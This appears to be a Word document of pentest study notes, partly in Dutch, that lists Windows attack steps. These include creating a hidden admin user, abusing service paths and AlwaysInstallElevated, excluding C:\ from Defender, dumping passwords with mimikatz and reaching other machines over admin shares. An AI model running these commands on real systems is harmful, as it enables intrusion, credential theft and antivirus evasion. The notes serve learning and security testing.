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507D6" w14:textId="71E17DD4" w:rsidR="0074562C" w:rsidRDefault="00FE061B" w:rsidP="00FE061B">
      <w:pPr>
        <w:pStyle w:val="Kop1"/>
      </w:pPr>
      <w:r>
        <w:t>Priviliges escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A511BE" w14:textId="701B5938" w:rsidR="00ED7F50" w:rsidRDefault="0083360C" w:rsidP="0083360C">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
      <w:r>
        <w:t>Commands to make user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDBC262" w14:textId="77777777" w:rsidR="0083360C" w:rsidRDefault="0083360C" w:rsidP="0083360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If you can run commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BCFC52" w14:textId="77777777" w:rsidR="0083360C" w:rsidRDefault="0083360C" w:rsidP="0083360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“Net user sjors Geheim123! /add”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0528C403" w14:textId="77777777" w:rsidR="0083360C" w:rsidRDefault="0083360C" w:rsidP="0083360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“Net localgroup administrators sjors /add”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F46210" w14:textId="77777777" w:rsidR="0083360C" w:rsidRDefault="0083360C" w:rsidP="0083360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Net user sjors /active:yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643AB918" w14:textId="35E47DF0" w:rsidR="0083360C" w:rsidRDefault="0083360C" w:rsidP="0083360C"/>
    <w:p w14:paraId="3A058745" w14:textId="77777777" w:rsidR="00156BA2" w:rsidRDefault="00156BA2" w:rsidP="00156BA2">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
      <w:r>
        <w:t>Making an .exe or .msi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01233671" w14:textId="77777777" w:rsidR="00156BA2" w:rsidRDefault="00156BA2" w:rsidP="00156BA2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Make batch file with things you want to run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEC2E65" w14:textId="77777777" w:rsidR="00156BA2" w:rsidRDefault="00156BA2" w:rsidP="00156BA2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">.bat to .exe 64 bit. Batch to exe converter </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00AA624B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://bat2exe.net/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19C02EB7" w14:textId="1E07A6C7" w:rsidR="00156BA2" w:rsidRDefault="00156BA2" w:rsidP="0083360C">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If you want to convert it to MSI then you can use </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00AA624B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.exetomsi.com/freeware</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B49D1E1" w14:textId="77777777" w:rsidR="00156BA2" w:rsidRPr="0083360C" w:rsidRDefault="00156BA2" w:rsidP="0083360C"/>
    <w:p w14:paraId="26F69449" w14:textId="0FDBCDEE" w:rsidR="00ED7F50" w:rsidRPr="00ED7F50" w:rsidRDefault="0083360C" w:rsidP="0083360C">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
      <w:r>
        <w:t>Find credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129D33EC" w14:textId="54BD1B09" w:rsidR="00F34D9D" w:rsidRDefault="00FE061B" w:rsidP="00296F8C">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sysvol is te decrypten</w:t>
      </w:r>
      <w:r w:rsidR="00FC7F7B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00BB1F5C" w:rsidRPr="005E15FA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\domain\SYSVOL\domain\policies\-\machine\groups.xml</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F34D9D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00BB1F5C" w:rsidRPr="005E15FA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1511E48F" w14:textId="19DB4FA8" w:rsidR="00BB1F5C" w:rsidRDefault="00BB1F5C" w:rsidP="00BB1F5C">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
      </w:pPr>
      <w:r>
        <w:t>Hiervoor google: gpp password retrieval handy stuff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0171F658" w14:textId="207FBD3B" w:rsidR="00FE061B" w:rsidRDefault="00FE061B" w:rsidP="00B747D0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Registry in autologon plaintext</w:t>
      </w:r>
      <w:r w:rsidR="00B747D0">
        <w:t xml:space="preserve">. Use Nirsoft </w:t>
      </w:r>
      <w:r w:rsidR="006D72CF">
        <w:t>for searching Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FBB8AD" w14:textId="193A71E3" w:rsidR="002B05C9" w:rsidRDefault="002B05C9" w:rsidP="00B965F9">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="1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HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Current Version\Winlogon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146D1F81" w14:textId="0F351EA9" w:rsidR="00FE061B" w:rsidRDefault="00FE061B" w:rsidP="00B747D0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Unattend.xml – panther – base64</w:t>
      </w:r>
      <w:r w:rsidR="00DC5071">
        <w:t xml:space="preserve"> %windows%\panther\unattend.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBB1D0D" w14:textId="430C0F4B" w:rsidR="0083360C" w:rsidRDefault="00FE061B" w:rsidP="0083360C">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Credential manager – export.crd – nirsoft makes credentail manager viewer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF39B07" w14:textId="5D7877D4" w:rsidR="003D2636" w:rsidRDefault="0083360C" w:rsidP="0083360C">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="003D2636">
        <w:t>chedulded tasks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7199F93F" w14:textId="55D20ADF" w:rsidR="0083360C" w:rsidRPr="0083360C" w:rsidRDefault="0083360C" w:rsidP="0083360C">
      <w:r>
        <w:t>Schedulded tasks have 2 ways to place your own .bat or .exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C449747" w14:textId="75F7E413" w:rsidR="004B7420" w:rsidRDefault="004B7420" w:rsidP="0083360C">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enter the filesystem via linux by using ubuntu desktop 20.04.2.0</w:t>
      </w:r>
      <w:r w:rsidR="002B05C9">
        <w:t>. Via here you can view files and edit files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F5AFA7" w14:textId="28495135" w:rsidR="0083360C" w:rsidRDefault="0083360C" w:rsidP="0083360C">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A folder where you can edit it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6AC30C" w14:textId="10CB2113" w:rsidR="0083360C" w:rsidRPr="0083360C" w:rsidRDefault="0083360C" w:rsidP="0049766C">
      <w:pPr>
        <w:pStyle w:val="HTML-voorafopgemaakt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bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Explorer location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382D4220" w14:textId="159C11FD" w:rsidR="0049766C" w:rsidRDefault="0049766C" w:rsidP="0049766C">
      <w:pPr>
        <w:pStyle w:val="HTML-voorafopgemaakt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C:\Windows\System32\Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CA9B42" w14:textId="6BB2EB18" w:rsidR="0083360C" w:rsidRDefault="0083360C" w:rsidP="0049766C">
      <w:pPr>
        <w:pStyle w:val="HTML-voorafopgemaakt"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49F1F9CB" w14:textId="0B8903E6" w:rsidR="0083360C" w:rsidRPr="0083360C" w:rsidRDefault="0083360C" w:rsidP="0049766C">
      <w:pPr>
        <w:pStyle w:val="HTML-voorafopgemaakt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bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Registry location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA2086C" w14:textId="5BC08C13" w:rsidR="0049766C" w:rsidRDefault="0049766C" w:rsidP="0049766C">
      <w:pPr>
        <w:pStyle w:val="HTML-voorafopgemaakt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HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\Taskcache\Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1629FE1D" w14:textId="77777777" w:rsidR="0049766C" w:rsidRDefault="0049766C" w:rsidP="0049766C">
      <w:pPr>
        <w:pStyle w:val="HTML-voorafopgemaakt"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\Taskcache\Tree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269D16DB" w14:textId="444CE015" w:rsidR="0049766C" w:rsidRDefault="0049766C" w:rsidP="00B747D0"/>
    <w:p w14:paraId="543D580D" w14:textId="51CE6F56" w:rsidR="0083360C" w:rsidRDefault="0083360C" w:rsidP="0083360C">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
      <w:r>
        <w:t>Insecure services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EE1BEA" w14:textId="359230D2" w:rsidR="00634D43" w:rsidRDefault="00634D43" w:rsidP="00B747D0">
      <w:r>
        <w:t xml:space="preserve">If a service has been added to windows without a description then it must be home made. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AECE257" w14:textId="69665371" w:rsidR="0083360C" w:rsidRPr="0083360C" w:rsidRDefault="0083360C" w:rsidP="000638B6">
      <w:pPr>
        <w:pStyle w:val="Kop3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>UNQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49ED899F" w14:textId="1D3E0C17" w:rsidR="00634D43" w:rsidRDefault="00634D43" w:rsidP="00B747D0">
      <w:r>
        <w:t>Unquoted service path.</w:t>
      </w:r>
      <w:r w:rsidR="00D111AD">
        <w:t xml:space="preserve"> Programma runnen die de naam heeft voor de spatie. C:\Program Files\windowstest\test.exe dan zal C:\program.exe worden uitgevoerd en daarna de paden waar het in zou kunnen staan. Dus C:\Program Files\test.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70629F80" w14:textId="2C390D0E" w:rsidR="00156BA2" w:rsidRDefault="00156BA2" w:rsidP="00156BA2">
      <w:pPr>
        <w:pStyle w:val="Kop3"/>
      </w:pPr>
      <w:r>
        <w:t>File Permission service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A992B4" w14:textId="2695DDF6" w:rsidR="00156BA2" w:rsidRDefault="00156BA2" w:rsidP="00156BA2">
      <w:r>
        <w:t>It is possible that a folder with an .exe has no deny permissions against everyone. Then you can place your own .exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABF1B74" w14:textId="77777777" w:rsidR="00156BA2" w:rsidRPr="0083360C" w:rsidRDefault="00156BA2" w:rsidP="00156BA2">
      <w:pPr>
        <w:pStyle w:val="Kop3"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208D1DF0" w14:textId="77777777" w:rsidR="00156BA2" w:rsidRDefault="00156BA2" w:rsidP="00156BA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Er is een plek waar je objecten van services kan vinden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C25022" w14:textId="77777777" w:rsidR="00156BA2" w:rsidRDefault="00156BA2" w:rsidP="00156BA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SysinternalSuite tools. “Accesschk64.exe -uwvqc lowpriv *” geeft services die writeable zijn voor dit account. Hiermee kun je service paths aanpassen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1989214A" w14:textId="77777777" w:rsidR="00156BA2" w:rsidRDefault="00156BA2" w:rsidP="00156BA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“Sc qc &lt;service&gt;” voorbeeld dmtsvc. Dit geeft info over de service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5389062F" w14:textId="5E70ECA6" w:rsidR="00156BA2" w:rsidRPr="00156BA2" w:rsidRDefault="00156BA2" w:rsidP="00156BA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Met “sc config” dmtsvc binpath= net user …… Hier kun je een command zetten of een exe runnen die iets moois voor je doet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B306787" w14:textId="50B72471" w:rsidR="0083360C" w:rsidRDefault="0083360C" w:rsidP="000638B6">
      <w:pPr>
        <w:pStyle w:val="Kop3"/>
      </w:pPr>
      <w:r w:rsidRPr="0083360C">
        <w:t>Insecure Service Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C78934" w14:textId="77777777" w:rsidR="0083360C" w:rsidRDefault="0083360C" w:rsidP="0083360C">
      <w:r>
        <w:t>Folder waar je services kan zien in reg:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFDEF06" w14:textId="19C47D20" w:rsidR="0083360C" w:rsidRPr="0083360C" w:rsidRDefault="0083360C" w:rsidP="00B747D0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HKLM\SYSTEM\CurrentControlSet\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Services in registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E5E856" w14:textId="4B284AE4" w:rsidR="004A5989" w:rsidRDefault="004A5989" w:rsidP="00B747D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Als de service path geedit kan worden dan kun je commands er in gooien.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16803611" w14:textId="77777777" w:rsidR="009F3F4F" w:rsidRPr="00022ECA" w:rsidRDefault="009F3F4F" w:rsidP="009F3F4F"/>
    <w:p w14:paraId="0341034F" w14:textId="467CF7E6" w:rsidR="004B2A74" w:rsidRDefault="004B2A74" w:rsidP="00156BA2">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
      <w:r>
        <w:t>Always install elevated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39409E50" w14:textId="2BEDF18E" w:rsidR="004B2A74" w:rsidRDefault="004B2A74" w:rsidP="004B2A74">
      <w:r>
        <w:t xml:space="preserve">Regedit: HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer of HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer of </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4293F99D" w14:textId="2520FFDF" w:rsidR="004B2A74" w:rsidRDefault="004B2A74" w:rsidP="004B2A74">
      <w:r>
        <w:t xml:space="preserve">Als dit 1 is kun je altijd MSI installers gebruiken, waarmee je access kan krijgen </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C75E207" w14:textId="77777777" w:rsidR="00156BA2" w:rsidRDefault="00156BA2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E04CF1F" w14:textId="2D3384AE" w:rsidR="00FD33EF" w:rsidRDefault="00FD33EF" w:rsidP="00FD33EF">
      <w:pPr>
        <w:pStyle w:val="Kop1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Defense evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D0B5BF" w14:textId="674CF0F8" w:rsidR="00A13CB1" w:rsidRDefault="00156BA2" w:rsidP="00A13CB1">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disable </w:t>
      </w:r>
      <w:r w:rsidR="00A13CB1">
        <w:t>Windows defender</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5FBC7C" w14:textId="2D24A10A" w:rsidR="00A13CB1" w:rsidRDefault="00A13CB1" w:rsidP="00A13CB1">
      <w:r>
        <w:t>Ignore everything out of c folder by adding an exlusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7142D7D1" w14:textId="2BA6B64E" w:rsidR="00FA6659" w:rsidRDefault="00FA6659" w:rsidP="00A13CB1">
      <w:r>
        <w:t>Defender can be shut off in the settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2803D687" w14:textId="2BE42378" w:rsidR="00311503" w:rsidRDefault="00311503" w:rsidP="00A13CB1">
      <w:r>
        <w:t xml:space="preserve">Via </w:t>
      </w:r>
      <w:r w:rsidR="00156BA2">
        <w:t xml:space="preserve">admin </w:t>
      </w:r>
      <w:r>
        <w:t>cmd:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ED98CF" w14:textId="343EA4CE" w:rsidR="00311503" w:rsidRDefault="00311503" w:rsidP="00156BA2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Powershell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62453465" w14:textId="6FD71198" w:rsidR="00311503" w:rsidRDefault="00311503" w:rsidP="00156BA2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Add-MpPreference -exclusionpath “C:\”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CADCBF" w14:textId="65F8BD9B" w:rsidR="00311503" w:rsidRDefault="00311503" w:rsidP="00156BA2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Get-MpPreference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15790E99" w14:textId="6031CA9D" w:rsidR="00036FA1" w:rsidRDefault="00036FA1" w:rsidP="00A13CB1"/>
    <w:p w14:paraId="7136CA5D" w14:textId="6B7EAD94" w:rsidR="00036FA1" w:rsidRDefault="00036FA1" w:rsidP="00036FA1">
      <w:pPr>
        <w:pStyle w:val="Kop1"/>
      </w:pPr>
      <w:r>
        <w:t>Credential access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D5E6D2" w14:textId="1F3591BF" w:rsidR="00156BA2" w:rsidRPr="00156BA2" w:rsidRDefault="00156BA2" w:rsidP="00156BA2">
      <w:r>
        <w:t>Next step is searching for the local admin password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27705F51" w14:textId="096115F3" w:rsidR="00036FA1" w:rsidRDefault="00036FA1" w:rsidP="00036FA1">
      <w:r>
        <w:t>Mimikatz reads the memory for passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C93BC0E" w14:textId="3EC1EB7F" w:rsidR="00156BA2" w:rsidRDefault="00156BA2" w:rsidP="00036FA1">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00382C1A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200918-fix</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="307A099C" w14:textId="7DA5CDD2" w:rsidR="00627E30" w:rsidRDefault="00627E30" w:rsidP="00036FA1">
      <w:r>
        <w:t>Enter a admin CMD prompt and run mimikatz trunk from there</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C85EF45" w14:textId="31669959" w:rsidR="00627E30" w:rsidRDefault="00675DF6" w:rsidP="00036FA1">
      <w:r>
        <w:t>commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4815B656" w14:textId="245CFE27" w:rsidR="00675DF6" w:rsidRDefault="00675DF6" w:rsidP="00156BA2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8EF4A3" w14:textId="0A7B6F40" w:rsidR="00675DF6" w:rsidRDefault="00675DF6" w:rsidP="00156BA2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sekurlsa::logonpasswords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CEE72D" w14:textId="47D0ED11" w:rsidR="00675DF6" w:rsidRDefault="00156BA2" w:rsidP="00675DF6">
      <w:r>
        <w:t>If their is no plaintext password for</w:t>
      </w:r>
      <w:r w:rsidR="001F0196">
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r>
        <w:t>he localadmin account then wd</w:t>
      </w:r>
      <w:r w:rsidR="001F0196">
        <w:t>igest is active.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35238B9B" w14:textId="3C0E5737" w:rsidR="001F0196" w:rsidRDefault="001F0196" w:rsidP="00675DF6">
      <w:r>
        <w:t>You need to elevate to system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DA20D4" w14:textId="0D34A08A" w:rsidR="00E40517" w:rsidRDefault="00E40517" w:rsidP="00156BA2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Token::elevate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FF9384" w14:textId="6164973B" w:rsidR="001F0196" w:rsidRDefault="001F0196" w:rsidP="001F0196">
      <w:r>
        <w:t>If this is disabled you can open a system prompt with this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA2EBE1" w14:textId="77777777" w:rsidR="001F0196" w:rsidRDefault="001F0196" w:rsidP="001F0196">
      <w:r>
        <w:t>Go to sysinternalsuits in admin cmd and enter this command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0A8BD2" w14:textId="557CF9F0" w:rsidR="001F0196" w:rsidRDefault="001F0196" w:rsidP="001F0196">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>PsExec.exe -i -s cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B01527A" w14:textId="6EE50CBB" w:rsidR="00E40517" w:rsidRDefault="001F0196" w:rsidP="00E40517">
      <w:r>
        <w:t>Open mimikatz and o</w:t>
      </w:r>
      <w:r w:rsidR="00E40517">
        <w:t>pen vault which contains passwords:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADA6844" w14:textId="0A59DED2" w:rsidR="00E40517" w:rsidRDefault="00E40517" w:rsidP="00156BA2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vault::cred /patch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2301A04A" w14:textId="77777777" w:rsidR="00627E30" w:rsidRDefault="00627E30" w:rsidP="00036FA1"/>
    <w:p w14:paraId="65B57712" w14:textId="77777777" w:rsidR="00156BA2" w:rsidRDefault="00156BA2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="18662CF0" w14:textId="7ABDFD90" w:rsidR="00564596" w:rsidRDefault="00564596" w:rsidP="00564596">
      <w:pPr>
        <w:pStyle w:val="Kop1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Lateral movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050D419E" w14:textId="77777777" w:rsidR="006E7324" w:rsidRDefault="00564596" w:rsidP="00564596">
      <w:r>
        <w:t>Use an ip subnet scanner</w:t>
      </w:r>
      <w:r w:rsidR="006E7324">
        <w:t>. Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB027A7" w14:textId="7D835B72" w:rsidR="0095610D" w:rsidRDefault="001F0196" w:rsidP="00564596">
      <w:r>
        <w:t>Local a</w:t>
      </w:r>
      <w:r w:rsidR="0095610D">
        <w:t>dmin CMD prompt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A80392" w14:textId="77777777" w:rsidR="00807650" w:rsidRDefault="00807650" w:rsidP="00156BA2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Net use x: </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="00382C1A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\&lt;ip</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> of other system&gt;\c$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635E4276" w14:textId="77777777" w:rsidR="00807650" w:rsidRDefault="00807650" w:rsidP="00156BA2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>X:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76371C1D" w14:textId="2582AFE7" w:rsidR="00085718" w:rsidRDefault="00807650" w:rsidP="00807650">
      <w:r>
        <w:t>Nu ben je in de c drive van een andere machine</w:t>
      </w:r>
    </w:p>
